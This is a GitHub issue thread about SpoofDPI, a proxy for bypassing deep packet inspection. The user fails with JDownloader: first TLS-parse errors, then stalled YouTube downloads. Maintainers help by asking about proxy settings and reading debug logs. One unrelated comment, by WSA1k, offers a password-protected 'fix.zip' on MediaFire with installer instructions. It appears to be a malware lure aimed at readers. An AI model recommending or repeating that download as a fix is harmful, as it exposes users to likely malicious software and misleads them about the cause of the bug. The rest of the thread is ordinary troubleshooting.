### ISSUE TITLE
[PROXY] error while parsing request: malformed HTTP request "\x16\x03\x03\x01(\x01\x00\x01$\...

### ISSUE THREAD

**Issue by acritum** [xvzc/SpoofDPI#193]
### Version

spoof-dpi v0.10.10

### Operating System

Manjaro

### How are you running SpoofDPI?

Any settings

### Description

When trying to download something using this proxi in JDownloader, always see something like this. I don't know if it's a java/jdownloader specific issue, or maybe SpoofDPI cannot parse unicode-style strings?

![Screenshot_20240825_104325](https://github.com/user-attachments/assets/2e8df695-fb71-43dd-85fb-9faa2c38c7a0)

**Comment by LiquidTheDangerous** [comment]
@acritum please, run with -debug and attach logs in txt format

**Comment by acritum** [comment]
I think the version is the latest because I installed it just today. The problem happens when trying to download any youtube video from JDownloader (https://jdownloader.org/). I don't see this problem in Firefox. Maybe it's specific to java applications or jdownloader only, I don't know. The log is attached.
[debug.txt](https://github.com/user-attachments/files/16741025/debug.txt)

**Comment by xvzc** [comment]
which browser are you using?

**Comment by acritum** [comment]
No need to use a browser. The issue can be seen when downloading directly from JDownloader. In Connection Manager tab, set proxy 127.0.0.1 port 8080 and try to download any youtube video to reproduce the issue.

**Comment by xvzc** [comment]
Could not reproduce on MacOS Sonoma. everything worked fine. I couldn't test the case on my Linux machine(Arch linux) because jdownloader doesn't work on it.

**Comment by xvzc** [comment]
Did you set the proxy config for HTTP and HTTPS too?

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by acritum** [comment]
I think Jdownloader should work on Arch because Manjaro is based on Arch and jdownloader works on Manjaro.
Anyway, I think you got the source of the problem. I set only https proxy in jdownloader but it needed 2 separate profiles for http and https proxies. As it was written that " SpoofDPI doesn't bypass Deep Packet Inspections for HTTP requets", I thought it is not needed and all the connections will be served via https, but for some reason http proxy is still used for something and jdownloader doesn't download from youtube without it. 

Now, when I set up a separate http proxy config, it works - I could download a video, however, it worked only once!!! Maybe they detected a http request to youtube and blocked all further connections, I'm not sure how it works. Now when I try to download a video it freezes after "using legacy fragmentation" and there is no data transfer:


DEBU[2024-08-26T11:33:47+03:00] [DNS] resolving www.youtube.com using general resolver(8.8.8.8:53) 
DEBU[2024-08-26T11:33:48+03:00] [DNS] resolved 74.125.131.198 from www.youtube.com in 276 ms 
DEBU[2024-08-26T11:33:48+03:00] [HTTPS] new connection to the server 192.168.0.181:37418 -> www.youtube.com 
DEBU[2024-08-26T11:33:48+03:00] [HTTPS] sent connection estabalished to 127.0.0.1:57832 
DEBU[2024-08-26T11:33:48+03:00] [HTTPS] client sent hello 307 bytes          
DEBU[2024-08-26T11:33:48+03:00] [HTTPS] writing chunked client hello to www.youtube.com 
DEBU[2024-08-26T11:33:48+03:00] [HTTPS] window-size: 0                       
DEBU[2024-08-26T11:33:48+03:00] [HTTPS] using legacy fragmentation 

===== freeze here, no data transferred =========
          
DEBU[2024-08-26T11:34:48+03:00] [HTTPS] finished reading from 127.0.0.1:57832 
DEBU[2024-08-26T11:34:48+03:00] [HTTPS] error reading from www.youtube.com: timed out 
DEBU[2024-08-26T11:34:48+03:00] [HTTPS] closing proxy connection: www.youtube.com -> 127.0.0.1:57832 
DEBU[2024-08-26T11:34:48+03:00] [HTTPS] closing proxy connection: 127.0.0.1:57832 -> www.youtube.com 
DEBU[2024-08-26T11:34:48+03:00] [PROXY] request from 127.0.0.1:44738


I'm not sure why it doesn't work anymore, if it's a http proxy issue or some measures from the gvrnmnt side...

PS: now I tried a "fresh" youtube video url, it downloads, but older ones are blocked. I need more time to understand what's wrong here, but now it looks not as a bug in  SpoofDPI but more like a hidden "gift" from the gvnmnt.

**Comment by acritum** [comment]
Sorry, after many attempts I couldn't understand why this doesn't work. I see that it tries and sometimes I can download one video after lots of restarts, but then it finally freezes and stucks after "using legacy fragmentation" and doesn't download anything. This makes it not very useful. I'll try alternative solutions, maybe they will work better. This seems to be a problem in JDownloader only, most likely this is not a bug in your software but it just works this way.

**Comment by xvzc** [comment]
I could reproduce this issue by setting the url of proxy server to `https://127.0.0.1:8080` instead of `http://127.0.0.1:8080`

**Comment by acritum** [comment]
If I use http://127.0.0.1:8080 it freezes after "using legacy fragmentation" and doesn't download anything :( I just found that when after freezing selecting "no proxy" and running the download for a few seconds, then stopping it, selecting proxy again and starting the download again, it makes it download (until the next freeze, at least). Very confusing and inconvenient, but still I can download the complete video after several restarts.

**Comment by xvzc** [comment]
Then maybe the issue's not related with this project i think

**Comment by acritum** [comment]
I'm not sure at the moment. All I see JD downloads from youtube using direct connection but freezes using spoofdpi proxy. Linkgrabber doesn't work with proxy at all. To be more sure I think I'll install Windows on a virtual machine and try GoodbyeDPI  when I have more time for tests, if it works, then the issue is with this project, if not, then there are probably severe restrictions on my ISP side that cannot be easily bypassed.

**Comment by acritum** [comment]
I just found https://github.com/txtsd/DPITunnel, it works perfectly with default settings on the same manjaro system with the same jdownloader settings. Downloads are very fast and there are no freezes. Evidently there is some problem with spoofdpi, but I don't know what exactly :(

**Comment by snowdusk** [comment]
malformed HTTP request "\x16\x03\x03\x01(\x01\x00\x01$

**Comment by acritum** [comment]
> So this error means that spoofdpi listen as a plain listener (not a tls listener) and the app try to connect to spoofdpi with tls

Yes, we already found it out that spoofdpi proxy should be connected as http only. What we couldn't find out is why it freezes and doesn't transfer data with jdownloader while DPITunnel works well with the same system configuration. I don't know if it's proxy software issue or DPITunnel just has some advanced "fooling" methods that SpoofDPI doesn't have to cheat DPI filters.
